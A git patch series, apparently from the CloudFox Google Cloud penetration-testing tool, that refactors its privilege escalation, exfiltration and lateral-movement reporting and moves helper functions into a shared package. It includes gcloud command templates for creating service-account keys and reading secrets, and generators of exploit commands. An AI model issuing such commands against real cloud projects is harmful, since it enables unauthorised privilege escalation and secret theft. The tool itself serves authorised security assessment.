PrivilegeEscalationPath{ - Name: fmt.Sprintf("Create key for %s", target.ServiceAccount), - Description: "Can create persistent service account keys", - Command: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", target.ServiceAccount), + ProjectID: target.ProjectID, + Permission: "iam.serviceAccountKeys.create", + Category: "Key Creation", + Description: fmt.Sprintf("Can create persistent keys for %s", target.ServiceAccount), SourceRole: "(via SA IAM policy)", SourceScope: fmt.Sprintf("project/%s", target.ProjectID), + Command: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", target.ServiceAccount), Confidence: "confirmed", RequiredPerms: "iam.serviceAccountKeys.create", } @@ -792,12 +802,26 @@ func (m *WhoAmIModule) identifyPrivEscPathsFromCache(cache *gcpinternal.PrivescC } for _, method := range methods { + // Extract project ID from target if available + projectID := "" + if strings.Contains(method.Target, "projects/") { + parts := strings.Split(method.Target, "/") + for i, p := range parts { + if p == "projects" && i+1 < len(parts) { + projectID = parts[i+1] + break + } + } + } + privEscPath := PrivilegeEscalationPath{ - Name: method.Method, + ProjectID: projectID, + Permission: method.Method, + Category: method.Category, Description: fmt.Sprintf("Risk Level: %s", method.RiskLevel), - Command: "", // Cache doesn't store exploit commands SourceRole: principal, SourceScope: method.Target, + Command: "", // Cache doesn't store exploit commands Confidence: strings.ToLower(method.RiskLevel), RequiredPerms: strings.Join(method.Permissions, ", "), } @@ -839,11 +863,13 @@ func (m *WhoAmIModule) identifyPrivEscPathsFromAnalysis(ctx context.Context, rel } privEscPath := PrivilegeEscalationPath{ - Name: path.Method, + ProjectID: path.ProjectID, + Permission: path.Method, + Category: path.Category, Description: path.Description, - Command: path.ExploitCommand, SourceRole: fmt.Sprintf("%s (%s)", path.Principal, path.PrincipalType), SourceScope: fmt.Sprintf("%s/%s", path.ScopeType, path.ScopeID), + Command: path.ExploitCommand, Confidence: strings.ToLower(path.RiskLevel), RequiredPerms: strings.Join(path.Permissions, ", "), } @@ -963,6 +989,8 @@ func (m *WhoAmIModule) identifyDataExfilFromCache(cache *gcpinternal.AttackPathC Category: method.Category, RiskLevel: method.RiskLevel, Description: method.Target, + SourceRole: principal, + SourceScope: fmt.Sprintf("%s/%s", method.ScopeType, method.ScopeID), } m.DataExfilCapabilities = append(m.DataExfilCapabilities, capability) } @@ -1013,6 +1041,8 @@ func (m *WhoAmIModule) identifyDataExfilFromAnalysis(ctx context.Context, releva Category: path.Category, RiskLevel: path.RiskLevel, Description: path.Description, + SourceRole: fmt.Sprintf("%s (%s)", path.Principal, path.PrincipalType), + SourceScope: fmt.Sprintf("%s/%s", path.ScopeType, path.ScopeID), } m.DataExfilCapabilities = append(m.DataExfilCapabilities, capability) } @@ -1078,6 +1108,8 @@ func (m *WhoAmIModule) identifyLateralFromCache(cache *gcpinternal.AttackPathCac Category: method.Category, RiskLevel: method.RiskLevel, Description: method.Target, + SourceRole: principal, + SourceScope: fmt.Sprintf("%s/%s", method.ScopeType, method.ScopeID), } m.LateralMoveCapabilities = append(m.LateralMoveCapabilities, capability) } @@ -1128,6 +1160,8 @@ func (m *WhoAmIModule) identifyLateralFromAnalysis(ctx context.Context, relevant Category: path.Category, RiskLevel: path.RiskLevel, Description: path.Description, + SourceRole: fmt.Sprintf("%s (%s)", path.Principal, path.PrincipalType), + SourceScope: fmt.Sprintf("%s/%s", path.ScopeType, path.ScopeID), } m.LateralMoveCapabilities = append(m.LateralMoveCapabilities, capability) } @@ -1204,7 +1238,7 @@ func (m *WhoAmIModule) generateLoot() { "# Required permissions: %s\n"+ "%s"+ "%s\n\n", - path.Name, + path.Permission, path.Description, path.SourceRole, path.SourceScope, @@ -1220,13 +1254,15 @@ func (m *WhoAmIModule) generateLoot() { m.LootMap["whoami-data-exfil"].Contents += fmt.Sprintf( "## %s\n"+ "# Category: %s\n"+ - "# Project: %s\n"+ "# Description: %s\n"+ + "# Source Role: %s\n"+ + "# Source Scope: %s\n"+ "%s\n\n", cap.Permission, cap.Category, - cap.ProjectID, cap.Description, + cap.SourceRole, + cap.SourceScope, generateExfilExploitCmd(cap.Permission, cap.ProjectID), ) } @@ -1236,13 +1272,15 @@ func (m *WhoAmIModule) generateLoot() { m.LootMap["whoami-lateral-movement"].Contents += fmt.Sprintf( "## %s\n"+ "# Category: %s\n"+ - "# Project: %s\n"+ "# Description: %s\n"+ + "# Source Role: %s\n"+ + "# Source Scope: %s\n"+ "%s\n\n", cap.Permission, cap.Category, - cap.ProjectID, cap.Description, + cap.SourceRole, + cap.SourceScope, generateLateralExploitCmd(cap.Permission, cap.ProjectID), ) } @@ -1519,77 +1557,50 @@ func (m *WhoAmIModule) buildTables() []internal.TableFile { }) } - // Privilege escalation table - if len(m.PrivEscPaths) > 0 { - privescHeader := []string{ - "Path Name", - "Description", - "Source Role", + // Combined attack paths table (privesc, data exfil, lateral movement) + totalPaths := len(m.PrivEscPaths) + len(m.DataExfilCapabilities) + len(m.LateralMoveCapabilities) + if totalPaths > 0 { + attackPathsHeader := []string{ + "Type", "Source Scope", - "Confidence", - "Required Perms", - "Command", + "Source Role", + "Permission", + "Category", + "Description", } - var privescBody [][]string + var attackPathsBody [][]string + + // Add privilege escalation paths for _, path := range m.PrivEscPaths { - privescBody = append(privescBody, []string{ - path.Name, - path.Description, - path.SourceRole, + attackPathsBody = append(attackPathsBody, []string{ + "Privesc", path.SourceScope, - path.Confidence, - path.RequiredPerms, - path.Command, + path.SourceRole, + path.Permission, + path.Category, + path.Description, }) } - tables = append(tables, internal.TableFile{ - Name: "whoami-privesc", - Header: privescHeader, - Body: privescBody, - }) - } - - // Data exfiltration capabilities table - if len(m.DataExfilCapabilities) > 0 { - exfilHeader := []string{ - "Project ID", - "Permission", - "Category", - "Description", - } - - var exfilBody [][]string + // Add data exfiltration capabilities for _, cap := range m.DataExfilCapabilities { - exfilBody = append(exfilBody, []string{ - cap.ProjectID, + attackPathsBody = append(attackPathsBody, []string{ + "Exfil", + cap.SourceScope, + cap.SourceRole, cap.Permission, cap.Category, cap.Description, }) } - tables = append(tables, internal.TableFile{ - Name: "whoami-data-exfil", - Header: exfilHeader, - Body: exfilBody, - }) - } - - // Lateral movement capabilities table - if len(m.LateralMoveCapabilities) > 0 { - lateralHeader := []string{ - "Project ID", - "Permission", - "Category", - "Description", - } - - var lateralBody [][]string + // Add lateral movement capabilities for _, cap := range m.LateralMoveCapabilities { - lateralBody = append(lateralBody, []string{ - cap.ProjectID, + attackPathsBody = append(attackPathsBody, []string{ + "Lateral", + cap.SourceScope, + cap.SourceRole, cap.Permission, cap.Category, cap.Description, @@ -1597,9 +1608,9 @@ func (m *WhoAmIModule) buildTables() []internal.TableFile { } tables = append(tables, internal.TableFile{ - Name: "whoami-lateral-movement", - Header: lateralHeader, - Body: lateralBody, + Name: "whoami-attack-paths", + Header: attackPathsHeader, + Body: attackPathsBody, }) } } From ed732d0c010bd1316e55e8db8e82eb6d3fb1a2cc Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Mon, 19 Jan 2026 15:35:39 -0500 Subject: [PATCH 26/48] migrated over to sdk and caching for standardization with aws modules --- gcp/commands/assetinventory.go | 3 +- gcp/commands/backupinventory.go | 3 +- gcp/commands/buckets.go | 53 +- gcp/commands/cloudsql.go | 21 +- gcp/commands/composer.go | 5 +- gcp/commands/dataexfiltration.go | 55 +- gcp/commands/dataproc.go | 9 +- gcp/commands/firewall.go | 9 +- gcp/commands/functions.go | 5 +- gcp/commands/gke.go | 13 +- gcp/commands/instances.go | 25 +- gcp/commands/kms.go | 5 +- gcp/commands/lateralmovement.go | 17 +- gcp/commands/loadbalancers.go | 3 +- gcp/commands/memorystore.go | 3 +- gcp/commands/monitoringalerts.go | 13 +- gcp/commands/networktopology.go | 15 +- gcp/commands/notebooks.go | 7 +- gcp/commands/orgpolicies.go | 17 +- gcp/commands/publicaccess.go | 31 +- gcp/commands/pubsub.go | 5 +- gcp/commands/secrets.go | 31 +- gcp/commands/whoami.go | 20 +- gcp/sdk/clients.go | 185 --- .../accessPolicyService.go | 25 +- gcp/services/apikeysService/apikeysService.go | 34 +- .../attackpathService/attackpathService.go | 108 +- .../beyondcorpService/beyondcorpService.go | 25 +- .../bigqueryService/bigqueryService.go | 18 +- .../bigtableService/bigtableService.go | 17 +- .../bucketEnumService/bucketEnumService.go | 33 +- .../certManagerService/certManagerService.go | 33 +- .../cloudArmorService/cloudArmorService.go | 23 +- .../cloudStorageService.go | 106 +- .../cloudbuildService/cloudbuildService.go | 25 +- .../cloudrunService/cloudrunService.go | 22 +- .../cloudsqlService/cloudsqlService.go | 19 +- .../composerService/composerService.go | 17 +- .../computeEngineService.go | 3 +- .../crossProjectService.go | 55 +- .../dataflowService/dataflowService.go | 17 +- .../dataprocService/dataprocService.go | 25 +- gcp/services/dnsService/dnsService.go | 23 +- .../domainWideDelegationService.go | 21 +- .../filestoreService/filestoreService.go | 17 +- .../functionsService/functionsService.go | 21 +- gcp/services/gkeService/gkeService.go | 21 +- gcp/services/hmacService/hmacService.go | 17 +- gcp/services/iamService/iamService.go | 85 +- gcp/services/iapService/iapService.go | 25 +- gcp/services/kmsService/kmsService.go | 23 +- .../loadbalancerService.go | 33 +- .../loggingGapsService/loggingGapsService.go | 52 +- gcp/services/loggingService/loggingService.go | 23 +- .../memorystoreService/memorystoreService.go | 17 +- .../networkEndpointsService.go | 35 +- gcp/services/networkService/networkService.go | 58 +- .../notebooksService/notebooksService.go | 25 +- .../orgpolicyService/orgpolicyService.go | 17 +- gcp/services/pubsubService/pubsubService.go | 22 +- .../resourceIAMService/resourceIAMService.go | 49 +- .../schedulerService/schedulerService.go | 21 +- gcp/services/secretsService/secretsService.go | 33 +- .../serviceAgentsService.go | 21 +- .../sourceReposService/sourceReposService.go | 21 +- gcp/services/spannerService/spannerService.go | 17 +- gcp/services/vpcService/vpcService.go | 41 +- gcp/services/vpcscService/vpcscService.go | 33 +- .../workloadIdentityService.go | 25 +- gcp/shared/aggregate.go | 239 ++++ gcp/shared/doc.go | 117 ++ gcp/shared/formatting.go | 219 ++++ gcp/shared/loot.go | 273 +++++ gcp/shared/network.go | 346 ++++++ gcp/shared/principals.go | 170 +++ gcp/shared/risk.go | 317 +++++ {gcp => internal/gcp}/sdk/cache.go | 0 internal/gcp/sdk/clients.go | 1051 +++++++++++++++++ {gcp => internal/gcp}/sdk/interfaces.go | 4 +- 79 files changed, 3721 insertions(+), 969 deletions(-) delete mode 100644 gcp/sdk/clients.go create mode 100644 gcp/shared/aggregate.go create mode 100644 gcp/shared/doc.go create mode 100644 gcp/shared/formatting.go create mode 100644 gcp/shared/loot.go create mode 100644 gcp/shared/network.go create mode 100644 gcp/shared/principals.go create mode 100644 gcp/shared/risk.go rename {gcp => internal/gcp}/sdk/cache.go (100%) create mode 100644 internal/gcp/sdk/clients.go rename {gcp => internal/gcp}/sdk/interfaces.go (100%) diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go index d869ade1..999f7064 100644 --- a/gcp/commands/assetinventory.go +++ b/gcp/commands/assetinventory.go @@ -10,6 +10,7 @@ import ( asset "cloud.google.com/go/asset/apiv1" "cloud.google.com/go/asset/apiv1/assetpb" assetservice "github.com/BishopFox/cloudfox/gcp/services/assetService" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -642,7 +643,7 @@ func (m *AssetInventoryModule) buildAssetsTable(assets []assetservice.AssetInfo) if asset.PublicAccess { for _, binding := range asset.IAMBindings { for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(member) { publicBody = append(publicBody, []string{ asset.ProjectID, m.GetProjectName(asset.ProjectID), diff --git a/gcp/commands/backupinventory.go b/gcp/commands/backupinventory.go index 725f0727..ebbae206 100644 --- a/gcp/commands/backupinventory.go +++ b/gcp/commands/backupinventory.go @@ -7,6 +7,7 @@ import ( "sync" "time" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -313,7 +314,7 @@ func (m *BackupInventoryModule) enumerateSnapshots(ctx context.Context, projectI }) // Check for public access for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(member) { snap.PublicAccess = true } } diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index 3bbc8229..ad3fc552 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -7,9 +7,10 @@ import ( "sync" CloudStorageService "github.com/BishopFox/cloudfox/gcp/services/cloudStorageService" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) @@ -205,43 +206,9 @@ func (m *BucketsModule) addBucketToLoot(projectID string, bucket CloudStorageSer ) } -// ------------------------------ -// Helper functions -// ------------------------------ -func boolToYesNo(b bool) string { - if b { - return "Yes" - } - return "No" -} - -// getMemberType extracts the member type from a GCP IAM member string -func getMemberType(member string) string { - switch { - case member == "allUsers": - return "PUBLIC" - case member == "allAuthenticatedUsers": - return "ALL_AUTHENTICATED" - case strings.HasPrefix(member, "user:"): - return "User" - case strings.HasPrefix(member, "serviceAccount:"): - return "ServiceAccount" - case strings.HasPrefix(member, "group:"): - return "Group" - case strings.HasPrefix(member, "domain:"): - return "Domain" - case strings.HasPrefix(member, "projectOwner:"): - return "ProjectOwner" - case strings.HasPrefix(member, "projectEditor:"): - return "ProjectEditor" - case strings.HasPrefix(member, "projectViewer:"): - return "ProjectViewer" - case strings.HasPrefix(member, "deleted:"): - return "Deleted" - default: - return "Unknown" - } -} +// Helper functions are now provided by the shared package: +// - shared.BoolToYesNo() for boolean formatting +// - shared.GetPrincipalType() for IAM member type extraction // ------------------------------ // Output Generation @@ -400,15 +367,15 @@ func (m *BucketsModule) bucketsToTableBody(buckets []CloudStorageService.BucketI if len(bucket.IAMBindings) > 0 { for _, binding := range bucket.IAMBindings { for _, member := range binding.Members { - memberType := getMemberType(member) + memberType := shared.GetPrincipalType(member) body = append(body, []string{ bucket.ProjectID, m.GetProjectName(bucket.ProjectID), bucket.Name, bucket.Location, publicDisplay, - boolToYesNo(bucket.VersioningEnabled), - boolToYesNo(bucket.UniformBucketLevelAccess), + shared.BoolToYesNo(bucket.VersioningEnabled), + shared.BoolToYesNo(bucket.UniformBucketLevelAccess), bucket.EncryptionType, binding.Role, memberType, @@ -424,8 +391,8 @@ func (m *BucketsModule) bucketsToTableBody(buckets []CloudStorageService.BucketI bucket.Name, bucket.Location, publicDisplay, - boolToYesNo(bucket.VersioningEnabled), - boolToYesNo(bucket.UniformBucketLevelAccess), + shared.BoolToYesNo(bucket.VersioningEnabled), + shared.BoolToYesNo(bucket.UniformBucketLevelAccess), bucket.EncryptionType, "-", "-", diff --git a/gcp/commands/cloudsql.go b/gcp/commands/cloudsql.go index 5e8009fc..c36f01f3 100644 --- a/gcp/commands/cloudsql.go +++ b/gcp/commands/cloudsql.go @@ -1,6 +1,7 @@ package commands import ( + "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" @@ -443,12 +444,12 @@ func (m *CloudSQLModule) instancesToTableBody(instances []CloudSQLService.SQLIns instance.Tier, publicIP, privateIP, - boolToYesNo(instance.RequireSSL), - boolToYesNo(instance.BackupEnabled), - boolToYesNo(instance.PointInTimeRecovery), + shared.BoolToYesNo(instance.RequireSSL), + shared.BoolToYesNo(instance.BackupEnabled), + shared.BoolToYesNo(instance.PointInTimeRecovery), encryptionDisplay, - boolToYesNo(instance.IAMAuthentication), - boolToYesNo(instance.PasswordPolicyEnabled), + shared.BoolToYesNo(instance.IAMAuthentication), + shared.BoolToYesNo(instance.PasswordPolicyEnabled), instance.AvailabilityType, networkName, network.Value, @@ -466,12 +467,12 @@ func (m *CloudSQLModule) instancesToTableBody(instances []CloudSQLService.SQLIns instance.Tier, publicIP, privateIP, - boolToYesNo(instance.RequireSSL), - boolToYesNo(instance.BackupEnabled), - boolToYesNo(instance.PointInTimeRecovery), + shared.BoolToYesNo(instance.RequireSSL), + shared.BoolToYesNo(instance.BackupEnabled), + shared.BoolToYesNo(instance.PointInTimeRecovery), encryptionDisplay, - boolToYesNo(instance.IAMAuthentication), - boolToYesNo(instance.PasswordPolicyEnabled), + shared.BoolToYesNo(instance.IAMAuthentication), + shared.BoolToYesNo(instance.PasswordPolicyEnabled), instance.AvailabilityType, "-", "-", diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go index 6814cdf7..84504c4b 100644 --- a/gcp/commands/composer.go +++ b/gcp/commands/composer.go @@ -1,6 +1,7 @@ package commands import ( + "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" @@ -232,8 +233,8 @@ func (m *ComposerModule) environmentsToTableBody(environments []composerservice. env.State, sa, attackPaths, - boolToYesNo(env.PrivateEnvironment), - boolToYesNo(env.EnablePrivateEndpoint), + shared.BoolToYesNo(env.PrivateEnvironment), + shared.BoolToYesNo(env.EnablePrivateEndpoint), airflowURI, dagBucket, imageVersion, diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index a7109d38..1ea23d26 100644 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -12,6 +12,7 @@ import ( orgpolicyservice "github.com/BishopFox/cloudfox/gcp/services/orgpolicyService" pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" vpcscservice "github.com/BishopFox/cloudfox/gcp/services/vpcscService" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -758,12 +759,14 @@ func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projec accessLevel := "" for _, binding := range policy.Bindings { for _, member := range binding.Members { - if member == "allUsers" { - accessLevel = "allUsers" - break - } - if member == "allAuthenticatedUsers" && accessLevel != "allUsers" { - accessLevel = "allAuthenticatedUsers" + if shared.IsPublicPrincipal(member) { + if member == "allUsers" { + accessLevel = "allUsers" + break + } + if accessLevel != "allUsers" { + accessLevel = "allAuthenticatedUsers" + } } } } @@ -829,12 +832,14 @@ func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID accessLevel := "" for _, binding := range policy.Bindings { for _, member := range binding.Members { - if member == "allUsers" { - accessLevel = "allUsers" - break - } - if member == "allAuthenticatedUsers" && accessLevel != "allUsers" { - accessLevel = "allAuthenticatedUsers" + if shared.IsPublicPrincipal(member) { + if member == "allUsers" { + accessLevel = "allUsers" + break + } + if accessLevel != "allUsers" { + accessLevel = "allAuthenticatedUsers" + } } } } @@ -908,12 +913,14 @@ func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectI accessLevel := "" for _, binding := range policy.Bindings { for _, member := range binding.Members { - if member == "allUsers" { - accessLevel = "allUsers" - break - } - if member == "allAuthenticatedUsers" && accessLevel != "allUsers" { - accessLevel = "allAuthenticatedUsers" + if shared.IsPublicPrincipal(member) { + if member == "allUsers" { + accessLevel = "allUsers" + break + } + if accessLevel != "allUsers" { + accessLevel = "allAuthenticatedUsers" + } } } } @@ -1621,18 +1628,6 @@ gcloud secrets versions access latest --secret=SECRET_NAME --project=%s`, projec } } -// extractPrincipalType extracts the type from a principal name like "user:email" or "serviceAccount:email" -func extractPrincipalType(principalName string) string { - if strings.HasPrefix(principalName, "user:") { - return "user" - } else if strings.HasPrefix(principalName, "serviceAccount:") { - return "serviceAccount" - } else if strings.HasPrefix(principalName, "group:") { - return "group" - } - return "unknown" -} - // ------------------------------ // Loot File Management // ------------------------------ diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go index 5d0b0548..30997711 100644 --- a/gcp/commands/dataproc.go +++ b/gcp/commands/dataproc.go @@ -1,6 +1,7 @@ package commands import ( + "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" @@ -233,8 +234,8 @@ func (m *DataprocModule) clustersToTableBody(clusters []dataprocservice.ClusterI workerConfig, sa, attackPaths, - boolToYesNo(!cluster.InternalIPOnly), - boolToYesNo(cluster.KerberosEnabled), + shared.BoolToYesNo(!cluster.InternalIPOnly), + shared.BoolToYesNo(cluster.KerberosEnabled), binding.Role, binding.Member, }) @@ -252,8 +253,8 @@ func (m *DataprocModule) clustersToTableBody(clusters []dataprocservice.ClusterI workerConfig, sa, attackPaths, - boolToYesNo(!cluster.InternalIPOnly), - boolToYesNo(cluster.KerberosEnabled), + shared.BoolToYesNo(!cluster.InternalIPOnly), + shared.BoolToYesNo(cluster.KerberosEnabled), "-", "-", }) diff --git a/gcp/commands/firewall.go b/gcp/commands/firewall.go index 9acc1e4e..39030f52 100644 --- a/gcp/commands/firewall.go +++ b/gcp/commands/firewall.go @@ -1,6 +1,7 @@ package commands import ( + "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" @@ -361,8 +362,8 @@ func (m *FirewallModule) rulesToTableBody(rules []NetworkService.FirewallRuleInf sources, allowed, targets, - boolToYesNo(rule.Disabled), - boolToYesNo(rule.LoggingEnabled), + shared.BoolToYesNo(rule.Disabled), + shared.BoolToYesNo(rule.LoggingEnabled), }) } return body @@ -390,7 +391,7 @@ func (m *FirewallModule) networksToTableBody(networks []NetworkService.VPCInfo) network.RoutingMode, fmt.Sprintf("%d", subnetCount), peerings, - boolToYesNo(network.AutoCreateSubnetworks), + shared.BoolToYesNo(network.AutoCreateSubnetworks), }) } return body @@ -407,7 +408,7 @@ func (m *FirewallModule) subnetsToTableBody(subnets []NetworkService.SubnetInfo) subnet.Name, subnet.Region, subnet.IPCidrRange, - boolToYesNo(subnet.PrivateIPGoogleAccess), + shared.BoolToYesNo(subnet.PrivateIPGoogleAccess), }) } return body diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go index f17cf6f6..6923f29a 100644 --- a/gcp/commands/functions.go +++ b/gcp/commands/functions.go @@ -1,6 +1,7 @@ package commands import ( + "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" @@ -484,7 +485,7 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func triggerInfo, url, fn.IngressSettings, - boolToYesNo(fn.IsPublic), + shared.BoolToYesNo(fn.IsPublic), serviceAccount, attackPaths, vpcConnector, @@ -505,7 +506,7 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func triggerInfo, url, fn.IngressSettings, - boolToYesNo(fn.IsPublic), + shared.BoolToYesNo(fn.IsPublic), serviceAccount, attackPaths, vpcConnector, diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go index e189d51b..7dc8a908 100644 --- a/gcp/commands/gke.go +++ b/gcp/commands/gke.go @@ -1,6 +1,7 @@ package commands import ( + "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" @@ -355,10 +356,10 @@ func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nod clusterBody = append(clusterBody, []string{ m.GetProjectName(cluster.ProjectID), cluster.ProjectID, cluster.Name, cluster.Location, endpoint, cluster.Status, cluster.CurrentMasterVersion, clusterMode, - boolToYesNo(cluster.PrivateCluster), boolToYesNo(cluster.MasterAuthorizedOnly), - boolToYesNo(cluster.NetworkPolicy), boolToYesNo(cluster.WorkloadIdentity != ""), - boolToYesNo(cluster.ShieldedNodes), boolToYesNo(cluster.BinaryAuthorization), - releaseChannel, boolToYesNo(cluster.ConfigConnector), + shared.BoolToYesNo(cluster.PrivateCluster), shared.BoolToYesNo(cluster.MasterAuthorizedOnly), + shared.BoolToYesNo(cluster.NetworkPolicy), shared.BoolToYesNo(cluster.WorkloadIdentity != ""), + shared.BoolToYesNo(cluster.ShieldedNodes), shared.BoolToYesNo(cluster.BinaryAuthorization), + releaseChannel, shared.BoolToYesNo(cluster.ConfigConnector), }) } @@ -396,8 +397,8 @@ func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nod nodePoolBody = append(nodePoolBody, []string{ m.GetProjectName(np.ProjectID), np.ProjectID, np.ClusterName, np.Name, np.MachineType, fmt.Sprintf("%d", np.NodeCount), saDisplay, attackPaths, - boolToYesNo(np.HasCloudPlatformScope), boolToYesNo(np.AutoUpgrade), - boolToYesNo(np.SecureBoot), boolToYesNo(np.Preemptible || np.Spot), + shared.BoolToYesNo(np.HasCloudPlatformScope), shared.BoolToYesNo(np.AutoUpgrade), + shared.BoolToYesNo(np.SecureBoot), shared.BoolToYesNo(np.Preemptible || np.Spot), }) } diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index fce9c5a1..6cb684c3 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -1,6 +1,7 @@ package commands import ( + "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" @@ -639,18 +640,18 @@ func (m *InstancesModule) instancesToTableBody(instances []ComputeEngineService. saEmail, attackPaths, scopes, - boolToYesNo(instance.HasDefaultSA), - boolToYesNo(instance.HasCloudScopes), - boolToYesNo(instance.OSLoginEnabled), - boolToYesNo(instance.OSLogin2FAEnabled), - boolToYesNo(instance.BlockProjectSSHKeys), - boolToYesNo(instance.SerialPortEnabled), - boolToYesNo(instance.CanIPForward), - boolToYesNo(instance.ShieldedVM), - boolToYesNo(instance.SecureBoot), - boolToYesNo(instance.VTPMEnabled), - boolToYesNo(instance.IntegrityMonitoring), - boolToYesNo(instance.ConfidentialVM), + shared.BoolToYesNo(instance.HasDefaultSA), + shared.BoolToYesNo(instance.HasCloudScopes), + shared.BoolToYesNo(instance.OSLoginEnabled), + shared.BoolToYesNo(instance.OSLogin2FAEnabled), + shared.BoolToYesNo(instance.BlockProjectSSHKeys), + shared.BoolToYesNo(instance.SerialPortEnabled), + shared.BoolToYesNo(instance.CanIPForward), + shared.BoolToYesNo(instance.ShieldedVM), + shared.BoolToYesNo(instance.SecureBoot), + shared.BoolToYesNo(instance.VTPMEnabled), + shared.BoolToYesNo(instance.IntegrityMonitoring), + shared.BoolToYesNo(instance.ConfidentialVM), encryption, kmsKey, } diff --git a/gcp/commands/kms.go b/gcp/commands/kms.go index d2354307..432c313f 100644 --- a/gcp/commands/kms.go +++ b/gcp/commands/kms.go @@ -7,6 +7,7 @@ import ( "sync" KMSService "github.com/BishopFox/cloudfox/gcp/services/kmsService" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -332,8 +333,8 @@ func (m *KMSModule) keysToTableBody(keys []KMSService.CryptoKeyInfo) [][]string key.PrimaryVersion, key.PrimaryState, rotation, - boolToYesNo(key.IsPublicEncrypt), - boolToYesNo(key.IsPublicDecrypt), + shared.BoolToYesNo(key.IsPublicEncrypt), + shared.BoolToYesNo(key.IsPublicDecrypt), } // If key has IAM bindings, create one row per binding diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go index 6d3e49cd..ffef7d14 100644 --- a/gcp/commands/lateralmovement.go +++ b/gcp/commands/lateralmovement.go @@ -12,6 +12,7 @@ import ( FunctionsService "github.com/BishopFox/cloudfox/gcp/services/functionsService" GKEService "github.com/BishopFox/cloudfox/gcp/services/gkeService" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -297,7 +298,7 @@ func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, pro // Token creators can impersonate for _, creator := range impersonationInfo.TokenCreators { // Skip allUsers/allAuthenticatedUsers - those are handled separately - if creator == "allUsers" || creator == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(creator) { continue } @@ -323,7 +324,7 @@ func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, pro // Key creators can create persistent access for _, creator := range impersonationInfo.KeyCreators { - if creator == "allUsers" || creator == "allAuthenticatedUsers" { + if shared.IsPublicPrincipal(creator) { continue } @@ -809,18 +810,6 @@ gcloud compute snapshots add-iam-policy-binding SNAPSHOT_NAME \ } } -// extractLateralPrincipalType extracts the type from a principal name -func extractLateralPrincipalType(principalName string) string { - if strings.HasPrefix(principalName, "user:") { - return "user" - } else if strings.HasPrefix(principalName, "serviceAccount:") { - return "serviceAccount" - } else if strings.HasPrefix(principalName, "group:") { - return "group" - } - return "unknown" -} - // ------------------------------ // Loot File Management // ------------------------------ diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go index 54ece4dc..9e9560ad 100644 --- a/gcp/commands/loadbalancers.go +++ b/gcp/commands/loadbalancers.go @@ -1,6 +1,7 @@ package commands import ( + "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" @@ -348,7 +349,7 @@ func (m *LoadBalancersModule) backendServicesToTableBody(services []loadbalancer be.Protocol, fmt.Sprintf("%d", be.Port), secPolicy, - boolToYesNo(be.EnableCDN), + shared.BoolToYesNo(be.EnableCDN), healthCheck, sessionAffinity, backends, diff --git a/gcp/commands/memorystore.go b/gcp/commands/memorystore.go index 3d57561d..8300892e 100644 --- a/gcp/commands/memorystore.go +++ b/gcp/commands/memorystore.go @@ -1,6 +1,7 @@ package commands import ( + "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" @@ -216,7 +217,7 @@ func (m 